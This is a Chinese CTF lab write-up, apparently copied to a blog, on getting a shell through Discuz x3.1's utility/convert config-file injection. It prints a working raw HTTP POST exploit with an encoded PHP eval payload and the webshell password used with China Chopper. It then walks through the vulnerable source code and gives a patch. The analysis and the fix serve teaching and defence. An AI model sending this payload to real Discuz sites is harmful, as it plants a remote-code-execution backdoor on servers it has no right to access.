Discuz x3.1 utility/convert/config.inc.php漏洞get shell
来源:互联网 发布:驱动精灵2013 mac 编辑:程序博客网 时间:2024/06/05 21:05
实验环境
i 春秋 — 竞赛训练 – 这不是DZ?
操作机: Windows XP
**实验工具:**BURP、中国菜刀
目标:获取www.test.ichunqiu网站的服务器权限。
信息搜集
这是一个纯内网环境,与外界没有联网。渗透目标单一,不需要做太多的信息搜集。
打开目标网站:
嗯,特别清楚的Discuz CMS。
简单分析一下CMS信息:Discuz! x3.1,显然。
信息搜集是可以考察一下技术支持单位,检查 “Powered by”信息。获取CMS信息,去网上找找有没有他的开源代码或是漏洞信息。
信息搜集之 漏洞信息搜集
利用百度、Google等搜索引擎搜集漏洞信息。(由于实验环境没有网,这些资料要在本地环境搜集)
这里可能会用到 Google hacking,搜索引擎语法。
漏洞信息 在一些漏洞平台比如乌云、补天、seebug等都可能有,当然有些可能要收费才能观看。
随便找了几个,就找到了我们需要的。https://www.exehack.net/134.html
漏洞:http://www.wooyun.org/bugs/wooyun-2010-045611
漏洞利用:
参加:https://bbs.ichunqiu.com/thread-1909-1-1.html
我有点懒得写了,直接复制粘贴,待会直接写源码分析了
打开 www.test.ichunqiu/utility/convert
直接使用EXP吧
POST /utility/convert/index.php HTTP/1.1Host: www.test.ichunqiuUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Length: 199Content-Type: application/x-www-form-urlencodeda=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes
其实其他都不重要,最后一句所传的数据才是重点!
上菜刀!拿shell!
地址:www.test.ichunqiu/utility/convert/data/config.inc.php 密码:c
源码分析
这漏洞出现在一个DZ X系列自带的转换工具里面!
漏洞路径:utility/convert/data/config.inc.php在开始设置里面可以设置数据的属性,而post的数据直接写到了config.inc.php这个文件里面,无任何过滤检测!
我从网上下载了Discuz x3.1的源码包,利用notepad++进行代码审计。
payload
首先我们看一下完整的payload:
a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes
漏洞原理
index.php 文件分析
首先,打开 utility/convert/index.php 的源码:
<?php// 包含了common.inc.php文件require './include/common.inc.php';// 关于getgpc函数 在global_func.php 中。参考:http://blog.csdn.net/xavierdarkness/article/details/78062852$action = getgpc('a');// 取$_POST['a'],直接赋值给$action ,此时$action = config;$action = empty($action) ? getgpc('action') : $action; //此时 $action = config;$source = getgpc('source') ? getgpc('source') : getgpc('s'); // $source = d7.2_x2.0 HTTP/1.1;$step = getgpc('step');$start = getgpc('start');……省略部分源码……if($action == 'source') { require DISCUZ_ROOT.'./include/do_source.inc.php'; // common.inc.php 如果config.inc.php文件不存在,就为true} elseif($action == 'config' || CONFIG_EMPTY) { // $action = config; 包含./include/do_config.inc.php 文件 require DISCUZ_ROOT.'./include/do_config.inc.php'; } elseif($action == 'setting') {……省略 ……?>
do_config.inc.php 文件分析
<?php$configfile = DISCUZ_ROOT.'./data/config.inc.php';$configfile_default = DISCUZ_ROOT.'./data/config.default.php';// 创建config.inc.php@touch($configfile);// 检查写入权限if(!is_writable($configfile)) { showmessage('config_write_error');}$config_default = loadconfig('config.default.php'); // 加载默认配置$error = array();// submitcheck()返回true,此函数定义在 include\global.func.php 文件中if(submitcheck()) { $newconfig = getgpc('newconfig');//取$_POST[newconfig]数据/*此时newconfig[aaaeval(eval("$_POST[c];"););//];*/ if(is_array($newconfig)) { $checkarray = $setting['config']['ucenter'] ? array('source', 'target', 'ucenter') : array('source', 'target'); foreach ($checkarray as $key) { if(!empty($newconfig[$key]['dbhost'])) { $check = mysql_connect_test($newconfig[$key], $key); if($check < 0) { $error[$key] = lang('mysql_connect_error_'.abs($check)); } } else { $error[$key] = lang('mysql_config_error'); } } //保存$newconfig到$configfile文件中,即config.inc.php文件。传入的数据没有经过任何过滤。 save_config_file($configfile, $newconfig, $config_default); if(empty($error)) { $db_target = new db_mysql($newconfig['target']); $db_target->connect(); delete_process('all'); showmessage('config_success', 'index.php?a=select&source='.$source); } }}?>
函数 save_config_file
所在文件:\utility\convert\include\global.func.php
function save_config_file($filename, $config, $default) { $config = setdefault($config, $default); // 将$config中的空白项用 $default 中对应项的值填充// 联系上下文,即将 './data/config.default.php'文件对应项 赋值给 $newconfig 这个数组中对应的空白项// 此时的$config = $newconfig+config.default.php对应项的补充 $date = gmdate("Y-m-d H:i:s", time() + 3600 * 8); $year = date('Y'); $content = <<<EOT<?php\$_config = array();EOT; // 看下一步getvars函数,此时的$config = $newconfig+config.default.php对应项的补充 $content .= getvars(array('_config' => $config)); $content .= "\r\n// ".str_pad(' THE END ', 50, '-', STR_PAD_BOTH)." //\r\n\r\n?>"; file_put_contents($filename, $content);}function setdefault($var, $default) { foreach ($default as $k => $v) { if(!isset($var[$k])) { $var[$k] = $default[$k]; } elseif(is_array($v)) { $var[$k] = setdefault($var[$k], $default[$k]); } } return $var;}
函数 getvars
所在文件:\utility\convert\include\global.func.php
// $data = array('_config' => $config) 其中 $config = $newconfig+config.default.php对应项的补充function getvars($data, $type = 'VAR') { $evaluate = ''; foreach($data as $key => $val) { if(!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $key)) { continue; } if(is_array($val)) { // 查看buildarray函数,$key 即为_config $evaluate .= buildarray($val, 0, "\${$key}")."\r\n"; } else { $val = addcslashes($val, '\'\\'); $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n"; } } return $evaluate;}
buildarray函数
所在文件:\utility\convert\include\global.func.php
// 这里的$array=$config $level=0 $pre=$_configfunction buildarray($array, $level = 0, $pre = '$_config') { static $ks; if($level == 0) { $ks = array(); $return = ''; } foreach ($array as $key => $val) { // 遍历$config 中的 $key => $val , 键值对应项 if($level == 0) { //str_pad — 使用另一个字符串填充字符串为指定长度 // 第一个参数是要输出的字符串,指定长度为50,用'-'填充,居中 $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH); /* 这里是产生漏洞关键 1. DISCUZ的本意是使用$config数组的key作为每一块配置区域的"注释标题" 2. 写入配置文件的$newline依赖于$key,而$key是攻击者可控的 3. 未对输入数据进行正确的边界处理,导致攻击者在输入数据中插入换行符,逃离注释的作用范围,从而使输入数据转化为可执行代码 1) 换行符 2) ?> 这类定界符都是可以达到同样的效果的 */ $return .= "\r\n// $newline //\r\n"; } $ks[$level] = $ks[$level - 1]."['$key']"; if(is_array($val)) { $ks[$level] = $ks[$level - 1]."['$key']"; $return .= buildarray($val, $level + 1, $pre); } else { $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val; $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n"; } } return $return;}
攻击造成的效果:
newconfig部分对照ASCII码转换一下就是如下所示:(%0a%0d对应Windows下的换行操作 \n\r)
newconfig[aaaeval(eval("$_POST[c];"););//]=aaaa
这里我们就是通过%0a%0d进行换行操作来绕过注释,并成功将我们的恶意代码写入文件,不被注释掉,从而导致我们可以通过菜刀直接连接。
防御方法
\discuz\utility\convert\include\global.func.php
function buildarray($array, $level = 0, $pre = '$_config') { static $ks; if($level == 0){ $ks = array(); $return = ''; } foreach ($array as $key => $val){ //过滤掉$key中的非字母、数字及下划线字符 $key = preg_replace("/[^\w]/", "", $key); if($level == 0) { $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH); $return .= "\r\n// $newline //\r\n"; } $ks[$level] = $ks[$level - 1]."['$key']"; if(is_array($val)){ $ks[$level] = $ks[$level - 1]."['$key']"; $return .= buildarray($val, $level + 1, $pre); }else{ $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val; $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n"; } } return $return;}
他山之石
同一个漏洞,别人写的文章:http://www.cnblogs.com/LittleHann/p/4317665.html
- Discuz x3.1 utility/convert/config.inc.php漏洞get shell
- Discuz! admin unwizard.inc.php 漏洞利用(Get Webshell)
- config.sample.inc.php
- config.inc.php文件
- php的config.inc.php
- discuz xconvert 执行转换 config.inc.php 不可写,转换没法继续啊!!
- 解析config.inc.php文件
- config.inc.php配置文件介绍
- 【discuz x3】space_notice.php分析
- discuz x3.1 去除后面的portal.php
- Discuz common.inc.php 部分解释-不断更新
- Discuz security.inc.php 代码解释
- Discuz!7.2 common.inc.php 学习
- Discuz!X3.1-x3.2 admin.php 防止直接恶意访问
- dedecms上传漏洞uploadsafe.inc.php 整理
- phpMyAdmin配置文件config.inc.php详解
- phpMyAdmin配置文件config.inc.php详解
- phpMyAdmin配置文件config.inc.php详解
- Codeforces 426E Sereja and Two Sequences【思维+Dp+二分】好题!
- 数组输出
- 某联考记录
- 协方差矩阵
- Java学习笔记之泛型(二):在方法上自定义泛型
- Discuz x3.1 utility/convert/config.inc.php漏洞get shell
- android 工具轮子
- Spring整合CXF开发基于rest的服务
- Spring整合JDBC
- SDUT—2139(图结构练习——BFS——从起始点到目标点的最短步数)
- 为什么要用全文搜索引擎:全文搜索引擎 VS 数据库管理系统
- 为什么液晶广告机有利于提升酒店的人气?——鑫飞广告机专家
- What's New in LLVM9.0
- Git指令